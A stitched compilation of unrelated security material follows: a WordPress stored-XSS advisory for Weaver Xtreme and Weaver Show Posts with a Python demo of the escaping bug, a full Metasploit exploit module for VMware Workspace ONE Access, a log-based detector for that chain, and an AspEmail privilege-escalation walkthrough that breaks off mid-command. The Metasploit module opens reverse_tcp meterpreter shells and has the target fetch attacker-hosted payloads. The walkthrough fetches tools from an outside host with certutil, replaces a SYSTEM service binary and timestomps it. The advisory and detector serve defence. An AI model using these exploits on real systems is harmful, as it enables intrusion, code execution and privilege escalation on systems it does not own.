weaver-xtreme<br /><br />Affected Versions: <= 5.0.7<br /><br />CVE ID: CVE-2023-1403<br /><br />CVSS Score: 6.4 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Ramuel Gall<br /><br />Fully Patched Version: 6.2<br /><br />The Weaver Xtreme theme for WordPress is vulnerable to stored Cross-Site Scripting due to insufficient escaping of the profile display name in versions up to, and including, 5.0.7. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.<br /><br />Description: Weaver Show Posts <= 1.6 - Authenticated(Contributor+) Stored Cross-Site Scripting via Display Name<br /><br />Affected Plugin: Weaver Show Posts<br /><br />Plugin Slug: show-posts<br /><br />Affected Versions: <= 1.6<br /><br />CVE ID: CVE-2023-1404<br /><br />CVSS Score: 6.4 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Alex Thomas<br /><br />Fully Patched Version: 1.7<br /><br />The Weaver Show Posts plugin for WordPress is vulnerable to stored Cross-Site Scripting due to insufficient escaping of the profile display name in versions up to, and including, 1.6. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.<br /><br />Vulnerability Analysis<br /><br />Both the Weaver Xtreme theme and the Weaver Show Posts plugin contain author attribution functionality that can be used by site visitors to view all posts by a given author. Although the function in question used escaping to prevent Cross-Site Scripting, the order of the functions used meant that the author name was not actually escaped upon output:<br /><br />[image: the vulnerable sprintf() call, in which esc_attr() is applied before sprintf() substitutes the author name]<br /><br />This is the sort of mistake that would be very difficult to spot via a manual code review - it looks correct and was almost certainly intended to prevent exactly the sort of issue we found. We only spotted it because one of the author names on our test platform was prepopulated with a Cross-Site Scripting payload, which fired when testing an unrelated issue.<br /><br />The reason this is vulnerable is that the esc_attr function runs before the sprintf function populates the unescaped output of the get_the_author function.<br /><br />The patched version simply escapes the output of get_the_author and then wraps the entire block in wp_kses_post for good measure:<br /><br />[image: the patched code, which escapes the output of get_the_author() and wraps the block in wp_kses_post()]<br /><br />This type of vulnerability emphasizes the need for dynamic security testing in addition to code review, as vulnerabilities are often hiding in plain sight.<br /><br />While this type of vulnerability does require a trusted (contributor+) attacker in most configurations to exploit, Cross-Site Scripting can be used to take over a website, for instance, if an administrator views or previews a post by a contributor with malicious JavaScript hidden in their author name.<br /><br />On sites that use contributors, it is required for administrators or editors to review posts by contributors in order to publish them, so this is a genuine risk for sites that make use of this functionality.<br /><br />Disclosure Timeline<br /><br />March 14, 2023 - Two members of our Threat Intelligence team, Ramuel Gall and Alex Thomas, find similar issues in the Weaver Xtreme theme and Weaver Show Posts plugin. Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. 
We responsibly disclose the plugin to the developer, who responds quickly.<br /><br />April 1, 2023 - The Weaver Show Posts plugin receives a patch in version 1.7.<br /><br />April 5, 2023 - The Weaver Xtreme theme receives a patch in version 6.2.<br /><br />April 13, 2023 - The firewall rule becomes available to all Wordfence users.<br /><br />Conclusion<br /><br />In today’s post, we detailed two flaws in the Weaver Xtreme theme and Weaver Show Posts plugin that enabled authenticated attackers, with at least contributor-level access to a site, to inject JavaScript via their display name which could ultimately lead to complete site compromise. This flaw has been fully patched in version 1.7 of Weaver Show Posts and 6.2 of Weaver Xtreme. We recommend that WordPress users immediately verify that their site has been updated to the latest patched versions available.<br /><br />Wordfence Premium, Care, and Response users received a firewall rule to protect against any exploits targeting this vulnerability on March 14, 2023. Sites still using the free version of Wordfence received the same protection on April 13, 2023.<br /><br />If you know a friend or colleague who is using the Weaver Xtreme theme or Weaver Show Posts plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected.<br /><br />If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard.<br /><br />Special thanks to Senior Web Application Vulnerability Researcher Alex Thomas for finding the second vulnerability in the Weaver Show Posts plugin shortly after the initial discovery of the Weaver Xtreme theme vulnerability.<br /></code></pre>
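<p>The escaping-order mistake described above (esc_attr applied to the format string before sprintf inserts the raw author name) is reproduced here in Python as an added example, not Wordfence's, Weaver's or WordPress's code: the vulnerable and patched orderings sit side by side, and a small parser shows which attributes a browser actually ends up with. The title phrase, the link markup and the hostile display name are constructed; the page shows the real PHP only as images, and the wp_kses_post layer of the patch is not reproduced.</p>

```python
import html
from html.parser import HTMLParser

# The translatable phrase that ends up in the author link's title attribute (constructed).
# It has no HTML-special characters, so escaping it instead of the author name is a no-op
# that still looks like proper escaping in a code review.
TITLE_TEMPLATE = "View all posts by %s"


def vulnerable_title(author_name: str) -> str:
    """Mirror of the bug: the phrase is escaped first, then the raw author name is substituted."""
    return html.escape(TITLE_TEMPLATE, quote=True) % author_name


def fixed_title(author_name: str) -> str:
    """Escape the dynamic value instead, which is the ordering the 1.7 / 6.2 patches use."""
    return TITLE_TEMPLATE % html.escape(author_name, quote=True)


def author_link(author_url: str, title: str, author_name: str) -> str:
    """Assemble the attribution markup; href and the visible name are always escaped here."""
    return (f'<a href="{html.escape(author_url, quote=True)}" title="{title}" rel="author">'
            f"{html.escape(author_name, quote=True)}</a>")


class _FirstTagAttrs(HTMLParser):
    """Collect the attributes a browser would see on the first tag of a fragment."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if self.attrs is None:
            self.attrs = dict(attrs)


def rendered_attributes(markup: str) -> dict:
    parser = _FirstTagAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs or {}


def title_stays_in_attribute(markup: str) -> bool:
    """True when the link carries only the three intended attributes, i.e. no attribute breakout."""
    return set(rendered_attributes(markup)) == {"href", "title", "rel"}


# Constructed display name that closes the title attribute and smuggles in an event handler.
HOSTILE_NAME = 'Mallory" onmouseover="alert(1)'

if __name__ == "__main__":
    for build in (vulnerable_title, fixed_title):
        markup = author_link("/author/mallory", build(HOSTILE_NAME), HOSTILE_NAME)
        print(build.__name__, sorted(rendered_attributes(markup)), title_stays_in_attribute(markup))
```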
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> include Exploit::EXE<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> class InvalidRequest < StandardError<br /> end<br /><br /> class InvalidResponse < StandardError<br /> end<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'VMware Workspace ONE Access VMSA-2022-0011 exploit chain',<br /> 'Description' => %q{<br /> This module combines two vulnerabilities in order to achieve remote code execution in the context of the<br /> `horizon` user. The first vulnerability CVE-2022-22956 is an authentication bypass in<br /> OAuth2TokenResourceController ACS which allows a remote, unauthenticated attacker to bypass the<br /> authentication mechanism and execute any operation. 
The second vulnerability CVE-2022-22957 is a JDBC<br /> injection RCE specifically in the DBConnectionCheckController class's dbCheck method which allows an attacker<br /> to deserialize arbitrary Java objects which can allow remote code execution.<br /> },<br /> 'Author' => [<br /> 'mr_me', # Discovery & PoC<br /> 'jheysel-r7' # Metasploit Module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-22956'],<br /> ['CVE', '2022-22957'],<br /> ['URL', 'https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html#dbconnectioncheckcontroller-dbcheck-jdbc-injection-remote-code-execution'],<br /> ['URL', 'https://github.com/sourceincite/hekate/'],<br /> ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html']<br /> ],<br /> 'DisclosureDate' => '2022-04-06',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => %i[curl wget],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => "\x22"<br /> },<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'LPORT' => 5555<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> # The VMware products affected do not expose any version information to 
unauthenticated users.<br /> # Attempt to exploit the auth bypass to determine if the target is vulnerable. Both the auth bypass and RCE were<br /> # patched in the following VMware update: https://kb.vmware.com/s/article/88099<br /> def check<br /> @token = get_authentication_token<br /> Exploit::CheckCode::Vulnerable('Successfully by-passed authentication by exploiting CVE-2022-22956')<br /> rescue InvalidRequest, InvalidResponse => e<br /> return Exploit::CheckCode::Safe("There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")<br /> end<br /><br /> # Exploit OAuth2TokenResourceController ACS Authentication Bypass (CVE-2022-22956).<br /> #<br /> # Return the authentication token<br /> def get_authentication_token<br /> oauth_client = ['Service__OAuth2Client', 'acs'].sample<br /> res_activation_token = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'generateActivationToken', oauth_client),<br /> 'method' => 'POST'<br /> })<br /><br /> unless res_activation_token<br /> raise InvalidRequest, 'No response from the server when requesting an activation token'<br /> end<br /><br /> unless res_activation_token.code == 200 && res_activation_token.headers['content-type'] == 'application/json;charset=UTF-8'<br /> raise InvalidResponse, "Unexpected response code:#{res_activation_token.code}, when requesting an activation token"<br /> end<br /><br /> activation_token = res_activation_token.get_json_document['activationToken']<br /><br /> res_client_info = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'activate'),<br /> 'method' => 'POST',<br /> 'Content-Type' => 'application/x-www-form-urlencoded',<br /> 'data' => activation_token<br /> })<br /><br /> unless res_client_info<br /> raise InvalidRequest, 'No response from client when sending the activation token and expecting client info in return'<br /> end<br 
/><br /> unless res_client_info.code == 200 && res_client_info.headers['content-type'] == 'application/json;charset=UTF-8'<br /> raise InvalidResponse, "Unexpected response code:#{res_client_info.code}, when sending the activation token and expecting client info in return"<br /> end<br /><br /> json_client_info = res_client_info.get_json_document<br /> client_id = json_client_info['client_id']<br /> client_secret = json_client_info['client_secret']<br /><br /> print_good("Leaked client_id: #{client_id}")<br /> print_good("Leaked client_secret: #{client_secret}")<br /> post_data = "grant_type=client_credentials&client_id=#{client_id}&client_secret=#{client_secret}"<br /><br /> res_access_token = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'auth', 'oauthtoken'),<br /> 'method' => 'POST',<br /> 'Content-Type' => 'application/x-www-form-urlencoded',<br /> 'data' => post_data<br /> })<br /><br /> unless res_access_token<br /> raise InvalidRequest, 'No response from the server when requesting the access token'<br /> end<br /><br /> unless res_access_token.code == 200 && res_access_token.headers['content-type'] == 'application/json;charset=UTF-8' && res_access_token.get_json_document['access_token']<br /> raise InvalidResponse, 'Invalid response from the server when requesting the access token'<br /> end<br /><br /> res_access_token.get_json_document['access_token']<br /> end<br /><br /> # Serve the files for the target machine to download.<br /> # If the request to the server ends in .xml the victim is requesting the spring bean generated by the generate_payload_xml method.<br /> # If the request doesn't end in .xml the victim is requesting the linux dropper payload.<br /> def on_request_uri(cli, request)<br /> vprint_status("on_request_uri - Request '#{request.method} #{request.uri}'")<br /> if request.to_s.include?('.xml')<br /> vprint_status('Sending XML response: ')<br /> send_response(cli, @payload_xml, { 'Content-Type' => 'application/octet-stream' })<br /> vprint_status('Response sent')<br /> else<br /> vprint_status('Sending PAYLOAD: ')<br /> send_response(cli, generate_payload_exe(code: payload.encoded), { 'Content-Type' => 'application/octet-stream' })<br /> end<br /> end<br /><br /> # Generates the malicious spring bean that will be hosted by the metasploit http server and downloaded and run by the victim<br /> #<br /> # Returns an XML document containing the payload.<br /> def generate_payload_xml(cmd)<br /> bean = ''<br /> builder = ::Builder::XmlMarkup.new(target: bean, indent: 2)<br /> builder.beans(xmlns: 'http://www.springframework.org/schema/beans', 'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance', 'xsi:schemaLocation': 'http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd') do<br /> builder.bean(id: 'pb', class: 'java.lang.ProcessBuilder', 'init-method': 'start') do<br /> builder.constructor do<br /> builder.list do<br /> builder.value('/bin/sh')<br /> builder.value('-c')<br /> builder.value(cmd)<br /> end<br /> end<br /> end<br /> end<br /><br /> bean.gsub!('constructor', 'constructor-arg')<br /> vprint_status(bean)<br /> bean<br /> end<br /><br /> # Calls the vulnerable dbCheck method in order to download and run the payload the module is hosting.<br /> # The PostgreSQL JDBC driver instantiates the class named in socketFactory with socketFactoryArg as its String<br /> # constructor argument; FileSystemXmlApplicationContext fetches the hosted bean XML from that URL and, on<br /> # refresh, creates the ProcessBuilder bean and runs its init-method (start).<br /> def trigger_jdbc_rce(jwt, sub_cmd)<br /> # jdbc_uri = "jdbc:postgresql://localhost:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#(unknown)"<br /> jdbc_uri = "jdbcUrl=jdbc%3Apostgresql%3A%2F%2Flocalhost%3A1337%2Fsaas%3FsocketFactory%3Dorg.springframework.context.support.FileSystemXmlApplicationContext%26socketFactoryArg%3Dhttp%3A%2F%2F#{datastore['LHOST']}%3A#{datastore['SRVPORT']}%2F#{@payload_name}&dbUsername=&dbPassword"<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'system', 'dbCheck'),<br /> 'method' => 'POST',<br 
/> 'Content-Type' => 'application/x-www-form-urlencoded',<br /> 'Connection' => 'keep-alive',<br /> 'cookie' => "HZN=#{jwt}",<br /> 'data' => jdbc_uri<br /> })<br /><br /> fail_with(Failure::Unreachable, "No response from the request to trigger the following sub command: #{sub_cmd}") unless res<br /> fail_with(Failure::UnexpectedReply, "Unexpected response from the request to trigger the following sub command: #{sub_cmd}") unless res.code == 406 && res.body == '{"success":false,"status":406,"message":"database.connection.notSuccess","code":406}'<br /> end<br /><br /> def execute_command(cmd, opts = {})<br /> vprint_status("Executing the following command: #{cmd}")<br /> @payload_xml = generate_payload_xml(cmd)<br /> trigger_jdbc_rce(opts[:jwt], cmd)<br /> end<br /><br /> # Instruct the user to exploit CVE-2022-22960<br /> def on_new_session(_client)<br /> print_good('Now background this session with "bg" and then run "resource run_cve-2022-22960_lpe.rc" to get a root shell')<br /> end<br /><br /> def exploit<br /> unless @token<br /> begin<br /> @token = get_authentication_token<br /> rescue InvalidRequest => e<br /> fail_with(Failure::Unreachable, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")<br /> rescue InvalidResponse => e<br /> fail_with(Failure::UnexpectedReply, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")<br /> end<br /> end<br /><br /> @payload_name = Rex::Text.rand_text_alpha(4..12) + '.xml'<br /> start_service('Path' => "/#{@payload_name}")<br /><br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded, { jwt: @token })<br /> when :linux_dropper<br /> execute_cmdstager({ jwt: @token })<br /> else<br /> fail_with(Failure::BadConfig, 'Invalid target specified')<br /> end<br /> end<br />end<br /></code></pre>
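A detection-side counterpart to the module, added here as an example by the editor and not part of the Metasploit module or of VMware's guidance: it replays constructed web-server access-log lines and flags the request sequence the check and exploit methods above issue. The log lines, IP addresses and timestamps are constructed; the request paths are the ones the module sends. Legitimate OAuth client onboarding can hit generateActivationToken too, so treat a hit as a lead to verify, not as proof.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Request paths used by the module above (CVE-2022-22956 chain, then CVE-2022-22957).
ACTIVATION_TOKEN_RE = re.compile(
    r"^/SAAS/API/1\.0/REST/oauth2/generateActivationToken/(?:Service__OAuth2Client|acs)$"
)
ACTIVATE_PATH = "/SAAS/API/1.0/REST/oauth2/activate"
OAUTH_TOKEN_PATH = "/SAAS/auth/oauthtoken"
DBCHECK_PATH = "/SAAS/API/1.0/REST/system/dbCheck"

# Common Log Format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one source running the full chain, one unrelated visitor.
SAMPLE_LOG = """\
203.0.113.10 - - [06/Apr/2022:10:00:01 +0000] "POST /SAAS/API/1.0/REST/oauth2/generateActivationToken/acs HTTP/1.1" 200 312
203.0.113.10 - - [06/Apr/2022:10:00:02 +0000] "POST /SAAS/API/1.0/REST/oauth2/activate HTTP/1.1" 200 198
203.0.113.10 - - [06/Apr/2022:10:00:03 +0000] "POST /SAAS/auth/oauthtoken HTTP/1.1" 200 874
203.0.113.10 - - [06/Apr/2022:10:00:05 +0000] "POST /SAAS/API/1.0/REST/system/dbCheck HTTP/1.1" 406 84
198.51.100.7 - - [06/Apr/2022:10:01:00 +0000] "GET /SAAS/auth/login HTTP/1.1" 200 5120
"""


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],
        "status": int(m["status"]),
    }


def detect(lines, window=timedelta(minutes=5)):
    """Return (ip, cve, detail) alerts.

    CVE-2022-22956: per source IP, generateActivationToken -> activate -> oauthtoken,
    all POST with 200, within `window`. CVE-2022-22957: any POST to dbCheck; note that
    a 406 is what the module treats as success, because the JDBC URL has already been
    consumed by the time the connection check fails.
    """
    alerts = []
    stage = defaultdict(lambda: (0, None))   # ip -> (chain steps completed, time of step 1)
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST":
            continue
        ip, path, ts, ok = ev["ip"], ev["path"], ev["ts"], ev["status"] == 200
        done, t0 = stage[ip]
        if ok and ACTIVATION_TOKEN_RE.match(path):
            stage[ip] = (1, ts)
        elif ok and path == ACTIVATE_PATH and done == 1 and ts - t0 <= window:
            stage[ip] = (2, t0)
        elif ok and path == OAUTH_TOKEN_PATH and done == 2 and ts - t0 <= window:
            alerts.append((ip, "CVE-2022-22956", "activation token -> activate -> oauthtoken within window"))
            stage[ip] = (0, None)
        if path == DBCHECK_PATH:
            alerts.append((ip, "CVE-2022-22957", f"POST dbCheck returned {ev['status']}"))
    return alerts


if __name__ == "__main__":
    for ip, cve, detail in detect(SAMPLE_LOG.splitlines()):
        print(f"{ip}\t{cve}\t{detail}")
```

Access logs do not carry POST bodies, so the socketFactory string in the dbCheck request is only visible in a WAF or full-request capture; the path plus the preceding bypass sequence from the same source is what the access log can give you.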
<pre><code>####################################################################################################################<br /># Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #<br /># Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #<br /># Date: 13/04/2023 #<br /># Exploit Author: Zer0FauLT [admindeepsec@proton.me] #<br /># Vendor Homepage: https://www.aspemail.com #<br /># Software Link: https://www.aspemail.com/download.html #<br /># Product: AspEmail #<br /># Version: AspEmail 5.6.0.2 and all #<br /># Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #<br /># Tested on: Windows Server 2016 and Windows Server 2019 #<br /># CVE : 0DAY #<br />####################################################################################################################<br /><br /># ==================================================================================================================<br /><br />[+] C:\PenTest>whoami /priv<br /><br /> PRIVILEGES INFORMATION<br /> ----------------------<br /><br /> Privilege Name Description State <br /> ============================= ========================================= ========<br /> SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled<br /> SeChangeNotifyPrivilege Bypass traverse checking Enabled <br /> SeImpersonatePrivilege Impersonate a client after authentication Enabled <br /> SeIncreaseWorkingSetPrivilege Increase a process working set Disabled<br /> <br /># ==================================================================================================================<br /><br />* First, we test whether the AspEmail service is running. With normal user rights, list the running processes and look for the service's process:<br /><br />[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe<br /> EmailAgent.exe 4400 Persits Software EmailAgent<br /><br /> or <br /><br />[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe<br /> EmailAgent64.exe 4400 Persits Software EmailAgent<br /> <br />* The process of the "Persits Software EmailAgent" service is present, so the service is in state RUNNING and AspEmail is active.<br /><br /># ==================================================================================================================<br /><br />* We will need these:<br /><br />[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit<br />[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"<br />[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"<br />[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"<br />[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"<br /><br /># ==================================================================================================================<br /> <br />[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"<br /><br /> Name: Persits Software EmailAgent<br /> ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run<br /> User : LocalSystem<br /> ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN<br /> IdentityReference : Everyone<br /> Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, <br /> AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, <br /> ReadExtendedAttributes, DeleteChild, Execute/Traverse<br /> Status : Unknown<br /> UserCanStart : False<br /> UserCanStop : False<br /> <br />[+] C:\PenTest>del PrivescCheck.ps1<br /><br />* PrivescCheck flags the "Persits Software EmailAgent" service: it runs as LocalSystem from a directory that Everyone can modify (the "Binary Permission Vulnerability" we are after).<br /><br /># ================================================================================================================== #<br /><br />[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"<br /><br /> Successfully processed 0 files; Failed processing 1 files<br /> C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.<br /><br />* We cannot even read the ACL of the parent AspEmail directory.<br /><br /># ==================================================================================================================<br /><br />[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"<br /><br /> C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)<br /> DeepSecLab\psacln:(I)(OI)(CI)(N)<br /> DeepSecLab\psaadm:(I)(OI)(CI)(N)<br /> DeepSecLab\psaadm_users:(I)(OI)(CI)(N)<br /> BUILTIN\Administrators:(I)(F)<br /> CREATOR OWNER:(I)(OI)(CI)(IO)(F)<br /> APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)<br /> NT SERVICE\TrustedInstaller:(I)(CI)(F)<br /> NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)<br /> BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)<br />
BUILTIN\Users:(I)(OI)(CI)(RX)<br /> APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)<br /> <br />* Unlike the other directories, the service's "BIN" directory grants Everyone Full control (F), and the (OI)(CI) flags make every file and subdirectory inherit it. <br />* That is the equivalent of chmod 0777 (rwxrwxrwx) on Linux.<br /> <br /># ==================================================================================================================<br /> <br />[+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID<br /><br /> __PATH <br /><br /> \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" <br /><br /> \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"<br /> root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16<br /> [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators<br /><br />* The "EmailAgent.exe" binary was installed by an administrator and is owned by BUILTIN\Administrators.<br /><br /># ==================================================================================================================<br /><br />* Now we take ownership of the directory, since our operations will take place under "BIN". Strictly speaking this is not required: Everyone already holds Full control, which is enough for the renames below. It also changes the directory owner, a visible artefact that the ownership check further down shows.<br /><br />[+] C:\PenTest>whoami<br /> DeepSecLab\Hacker<br /><br />[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"<br /> SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".<br /> <br />[+] C:\PenTest>icacls "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /grant DeepSecLab\Hacker:F<br /><br /> processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN<br /> Successfully processed 1 files; Failed processing 0 files<br /> <br />* All commands succeeded. We now have full privileges for this directory. <br /> <br /># ==================================================================================================================<br /><br />* Now we replace the EmailAgent binary with our own payload. <br />* We keep the original file intact so that everything can be reverted afterwards.<br /><br />[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe<br />[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe<br /><br /># ==================================================================================================================<br /><br />[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir<br /> Volume in drive C has no label.<br /> Volume Serial Number is 0C8A-5291<br /><br /> Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin<br /><br /> 14.04.2023 16:47 <DIR> .<br /> 14.04.2023 16:47 <DIR> ..<br /> 01.03.2004 15:55 143.360 AspEmail.dll<br /> 25.02.2004 16:23 188.416 AspUpload.dll<br /> 13.04.2023 22:00 12.288 EmailAgent.exe <<<=== renamed from EmailAgentPrivESC.exe<br /> 24.09.2003 09:22 139.264 EmailAgentCfg.cpl<br /> 24.09.2003 09:25 94.208 EmailLogger.dll<br /> 24.09.2003 09:21 167.936 Null.EmailAgent.exe<br /> 6 File(s) 745.472 bytes<br /> 2 Dir(s) 165.936.717.824 bytes free<br /> <br /># ==================================================================================================================<br /><br />* Now we set the creation, last-modified and last-accessed timestamps of the replacement so it blends in with its neighbours.<br /><br />[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"<br />[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe<br /><br /># 
==================================================================================================================<br /><br />[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir<br /> Volume in drive C has no label.<br /> Volume Serial Number is 0C8A-5291<br /><br /> Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin<br /><br /> 14.04.2023 16:47 <DIR> .<br /> 14.04.2023 16:47 <DIR> ..<br /> 01.03.2004 15:55 143.360 AspEmail.dll<br /> 25.02.2004 16:23 188.416 AspUpload.dll<br /> 24.09.2003 09:21 12.288 EmailAgent.exe<br /> 24.09.2003 09:22 139.264 EmailAgentCfg.cpl<br /> 24.09.2003 09:25 94.208 EmailLogger.dll<br /> 24.09.2003 09:21 167.936 Null.EmailAgent.exe<br /> 6 File(s) 745.472 bytes<br /> 2 Dir(s) 165.936.717.824 bytes free<br /> <br /> [24.09.2003 09:21] 12.288 EmailAgent.exe<br /> [24.09.2003 09:21] 167.936 Null.EmailAgent.exe<br /> <br />* And time manipulation is over. They look like they were uploaded at the same time long ago.<br /><br /># ==================================================================================================================<br /><br />* Now we check for my malware ownership.<br /><br />[+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID<br /><br /> __PATH <br /><br /> 